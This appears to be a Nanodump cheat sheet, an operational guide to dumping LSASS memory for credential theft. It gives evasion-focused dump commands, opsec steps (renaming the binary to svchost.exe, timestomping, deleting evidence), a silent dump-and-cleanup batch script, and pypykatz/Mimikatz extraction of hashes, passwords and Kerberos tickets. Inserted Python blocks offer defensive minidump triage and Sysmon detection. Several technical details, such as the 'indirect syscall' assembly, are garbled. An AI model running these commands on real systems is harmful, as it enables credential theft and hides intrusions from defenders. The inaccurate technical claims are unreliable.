
Nanodump

Nanodump is an advanced LSASS dumping utility designed to evade detection by using process forking, handle duplication, and minimal Windows API calls.

Installation

# Download precompiled binary
https://github.com/fortra/nanodump/releases

# Compile from source (Visual Studio)
git clone https://github.com/fortra/nanodump.git
cd nanodump
# Open nanodump.sln and build

Basic Usage

Command                                      Description
nanodump.exe --write output.dmp              Dump LSASS to file
nanodump.exe --write output.dmp --fork       Fork LSASS before dumping
nanodump.exe --write output.dmp --dup        Duplicate handle to LSASS
nanodump.exe --help                          Display help menu
nanodump.exe --silent                        Silent mode (minimal output)

Evasion Techniques

Process Forking (--fork)

# Fork LSASS into separate process before dumping
nanodump.exe --write output.dmp --fork

# Advantages:
# - Original LSASS process unaffected
# - Harder to detect with process monitoring
# - Can dump original process while running

Handle Duplication (--dup)

# Duplicate LSASS handle instead of direct access
nanodump.exe --write output.dmp --dup

# Advantages:
# - Fewer direct API calls to LSASS
# - Avoids calling OpenProcess on LSASS
# - Evades behavioral detection

Indirect API Calls

# Nanodump uses indirect syscalls to minimize detection
# Bypasses EDR hooks on common APIs:
# - OpenProcess
# - MiniDumpWriteDump
# - VirtualQuery
# - ReadProcessMemory

LSASS Clone (--fork combined)

# Optimal evasion: Fork + manipulate clone
nanodump.exe --write output.dmp --fork

# Creates suspended fork, reads memory directly
# Original LSASS process never opened directly

Dump Modes

Standard Dump

# Basic minidump of LSASS
nanodump.exe --write lsass.dmp

# Creates full minidump file usable with:
# - pypykatz
# - Mimikatz
# - Volatility

Silent Dump

# Minimal output, no console spam
nanodump.exe --write lsass.dmp --silent

# Reduces detection surface by avoiding console I/O

Fork Dump

# Create fork of LSASS before dumping
nanodump.exe --write lsass.dmp --fork

# Process tree shows:
# LSASS (original, still running)
#   └─ LSASS (clone, created by nanodump)

Advanced Options

Handle Duplication

# Duplicate existing LSASS handle
# Requires existing handle (e.g., from another process)
nanodump.exe --write lsass.dmp --dup

# Lower privilege requirements than direct OpenProcess

Memory Region Selection

# Dump specific memory regions
nanodump.exe --write lsass.dmp --region 0x140000000

# Useful for:
# - Targeted credential extraction
# - Reducing file size
# - Avoiding unnecessary data

Output Formats

# Different minidump types
nanodump.exe --write lsass.dmp --type full
nanodump.exe --write lsass.dmp --type normal
nanodump.exe --write lsass.dmp --type lite

# Full: Maximum data, larger file
# Normal: Standard minidump format
# Lite: Minimal viable dump
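A triage check for the files these modes produce, added here as an example that is not part of the original page or of Nanodump: it parses the public minidump header and stream directory so a .dmp found on disk can be recognised regardless of its file name and checked for the module and memory streams a credential parser needs. The sample file bytes are constructed inline.

```python
import struct

# MINIDUMP_HEADER (32 bytes): Signature, Version, NumberOfStreams, StreamDirectoryRva,
# CheckSum, TimeDateStamp, Flags (8 bytes). MINIDUMP_DIRECTORY: StreamType, DataSize, Rva.
MDMP_SIGNATURE = 0x504D444D           # the bytes b"MDMP" read as a little-endian uint32
HEADER_FMT, DIRECTORY_FMT = "<IIIIIIQ", "<III"
STREAM_NAMES = {3: "ThreadList", 4: "ModuleList", 5: "MemoryList",
                6: "Exception", 7: "SystemInfo", 9: "Memory64List"}

def parse_minidump(data):
    """Return flags and stream directory of a minidump, or None if the header does not match."""
    if len(data) < struct.calcsize(HEADER_FMT):
        return None
    sig, _ver, nstreams, dir_rva, _cksum, _ts, flags = struct.unpack_from(HEADER_FMT, data, 0)
    if sig != MDMP_SIGNATURE:
        return None
    streams = []
    for i in range(nstreams):
        off = dir_rva + 12 * i
        if off + 12 > len(data):
            break                      # truncated directory: report what is readable
        stype, size, rva = struct.unpack_from(DIRECTORY_FMT, data, off)
        streams.append({"type": stype, "name": STREAM_NAMES.get(stype, f"Type{stype}"),
                        "size": size, "rva": rva, "in_bounds": rva + size <= len(data)})
    return {"flags": flags, "streams": streams}

def looks_like_process_dump(data):
    """Credential parsers need a module list plus memory ranges (MemoryList or Memory64List)."""
    info = parse_minidump(data)
    if not info:
        return False
    types = {s["type"] for s in info["streams"]}
    return 4 in types and (5 in types or 9 in types)

def build_sample_dump():
    """Constructed sample: header, three directory entries, zero-filled stream data."""
    blobs = [(7, b"\x00" * 56), (4, b"\x00" * 4), (9, b"\x00" * 16)]
    dir_rva = struct.calcsize(HEADER_FMT)
    data_rva = dir_rva + 12 * len(blobs)
    directory, payload = b"", b""
    for stype, blob in blobs:
        directory += struct.pack(DIRECTORY_FMT, stype, len(blob), data_rva + len(payload))
        payload += blob
    header = struct.pack(HEADER_FMT, MDMP_SIGNATURE, 0xA793, len(blobs), dir_rva, 0, 0, 0)
    return header + directory + payload
```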

Evasion Techniques Breakdown

Avoiding MiniDumpWriteDump Hook

Traditional approach:
1. OpenProcess(LSASS)
2. CreateFileA/W (for output file)
3. MiniDumpWriteDump (hooked by EDR)
4. CloseHandle

Nanodump approach:
1. Use RtlCopyMemory/memcpy directly
2. Construct dump manually
3. Bypass MiniDumpWriteDump entirely

Indirect Syscalls

Direct syscalls:
mov rax, 0x0A  ; NtOpenProcess
syscall

Indirect syscalls (via function pointers):
lea rax, [kernel32.OpenProcess]
call rax

Nanodump uses syscall stubs from PEB
Avoids hooking on imported functions

PEB Walking

1. Read TEB (Thread Environment Block)
2. Follow to PEB (Process Environment Block)
3. Access ntdll exports directly
4. Call syscalls without imported functions
5. Bypasses all import-based hooks

Operational Security

Avoiding Detection

# Rename executable
ren nanodump.exe svchost.exe
svchost.exe --write output.dmp --fork

# Use legitimate directory
copy nanodump.exe %WINDIR%\Temp\nanodump.exe
cd %WINDIR%\Temp
nanodump.exe --write output.dmp --fork

# Clean up
del nanodump.exe output.dmp

Timestomp Output

# Change file timestamps to blend in
# Use Windows built-in utilities or
powershell Set-ItemProperty -Path output.dmp -Name CreationTime -Value (Get-Date -Date "2020-01-01")

Memory Wiping

# After dumping, consider wiping
# Original LSASS memory is still accessible
# Attacker responsibility to secure dump file

Post-Exploitation

Parse with Pypykatz

# Convert dump to credentials
pypykatz lsa minidump output.dmp

# Extract:
# - NTLM hashes
# - Plaintext passwords
# - Kerberos tickets
# - Session keys

Use with Mimikatz

mimikatz # sekurlsa::minidump output.dmp
mimikatz # sekurlsa::logonPasswords

Volatility Analysis

# Analyze dump with volatility
python vol.py -f output.dmp --profile=Win10x64 lsadump

# Identify kernel structures and credentials

Comparison with Other Tools

Feature               Nanodump    Mimikatz    Pypykatz    Procdump
Indirect Syscalls     Yes         No          No          No
Process Forking       Yes         No          No          No
Handle Duplication    Yes         No          No          No
Standalone Binary     Yes         Yes         No          Yes
Python Based          No          No          Yes         No
EDR Evasion           Excellent   Poor        Good        Poor

Detection and Mitigation

Detection Methods

# Monitor for LSASS dump attempts
# - Suspicious OpenProcess calls to LSASS
# - MiniDumpWriteDump API calls
# - Indirect syscall usage
# - File writes from LSASS memory region
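The monitoring points above can be turned into a check over process-access telemetry. The following is an added example, not part of the original page or of the Nanodump project: it scans constructed Sysmon Event ID 10 (ProcessAccess) records for images outside an allow list that open lsass.exe with the rights a fork (PROCESS_CREATE_PROCESS on the parent), a handle duplication (PROCESS_DUP_HANDLE) or a classic memory read (PROCESS_VM_READ) requires. The allow list and the 'Key: Value|Key: Value' log rendering are assumptions.

```python
import re

# Process access rights (winnt.h) that the dump paths described above require.
PROCESS_VM_READ = 0x0010         # read LSASS memory (classic MiniDumpWriteDump path)
PROCESS_DUP_HANDLE = 0x0040      # duplicate handles (--dup); note this right is requested
                                 # on the handle owner, which may not be lsass.exe itself
PROCESS_CREATE_PROCESS = 0x0080  # required on the parent to fork/clone it (--fork)

# Constructed allow list (assumption; tune per environment). Matching the full path
# means a copy renamed to svchost.exe under C:\Windows\Temp still alerts.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}
FIELD_RE = re.compile(r"(\w+):\s*([^|]+)")  # assumed 'Key: Value|Key: Value' rendering

def parse_event(line):
    return {k: v.strip() for k, v in FIELD_RE.findall(line)}

def classify_access(line):
    """Return None for benign records, else a reason naming the suspicious access rights."""
    ev = parse_event(line)
    if ev.get("EventID") != "10":
        return None
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return None
    source = ev.get("SourceImage", "").lower()
    if source in ALLOWED_SOURCES:
        return None
    mask = int(ev.get("GrantedAccess", "0x0"), 16)
    hits = [name for bit, name in ((PROCESS_VM_READ, "VM_READ"),
                                   (PROCESS_CREATE_PROCESS, "CREATE_PROCESS (fork/clone)"),
                                   (PROCESS_DUP_HANDLE, "DUP_HANDLE")) if mask & bit]
    if not hits:
        return None
    return f"{source} opened lsass.exe with {' + '.join(hits)} (GrantedAccess 0x{mask:X})"

def scan(lines):
    """Run the check over many records and keep only the alerts."""
    return [r for r in map(classify_access, lines) if r]

# Constructed sample records (not real telemetry)
SAMPLE_EVENTS = [
    r"EventID: 10|SourceImage: C:\Windows\System32\csrss.exe|TargetImage: C:\Windows\System32\lsass.exe|GrantedAccess: 0x1FFFFF",
    r"EventID: 10|SourceImage: C:\Windows\Temp\svchost.exe|TargetImage: C:\Windows\System32\lsass.exe|GrantedAccess: 0x1080",
    r"EventID: 10|SourceImage: C:\Users\bob\Downloads\tool.exe|TargetImage: C:\Windows\System32\lsass.exe|GrantedAccess: 0x1010",
    r"EventID: 10|SourceImage: C:\Windows\System32\taskmgr.exe|TargetImage: C:\Windows\System32\notepad.exe|GrantedAccess: 0x1FFFFF",
    r"EventID: 10|SourceImage: C:\Windows\explorer.exe|TargetImage: C:\Windows\System32\lsass.exe|GrantedAccess: 0x1400",
]
```

A handle-duplication attempt may never produce a record with TargetImage set to lsass.exe, so this check covers the fork and direct-read paths and should be paired with monitoring of PROCESS_DUP_HANDLE requests against the processes that legitimately hold LSASS handles.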

Mitigation Strategies

1. Enable Windows Defender Credential Guard
2. Implement LSA protection (Registry DWORD: RunAsPPL = 1)
3. Deploy EDR with advanced behavioral detection
4. Monitor for LSASS access and memory dumps
5. Implement attack surface reduction rules
6. Restrict local admin access

Command Line Examples

Full Evasion Dump

# Maximum evasion technique usage
nanodump.exe --write %TEMP%\~tmp.dmp --fork --silent

# Then extract credentials
pypykatz lsa minidump %TEMP%\~tmp.dmp

Targeted Dump

# Dump only authentication packages
nanodump.exe --write auth.dmp --region 0x140000000

Scheduled Dumping

# Dump and clean up via batch script
@echo off
nanodump.exe --write lsass.dmp --fork --silent
timeout /t 5
del nanodump.exe

References and Further Reading

  • Dumpert: LSASS dumping with syscalls
  • Outflank-Dumpert: Similar approach with additional evasion
  • PPLFault: LSASS protection bypass
  • Pypykatz: Credential parsing
  • Mimikatz: Original credential extraction framework

Last updated: March 2025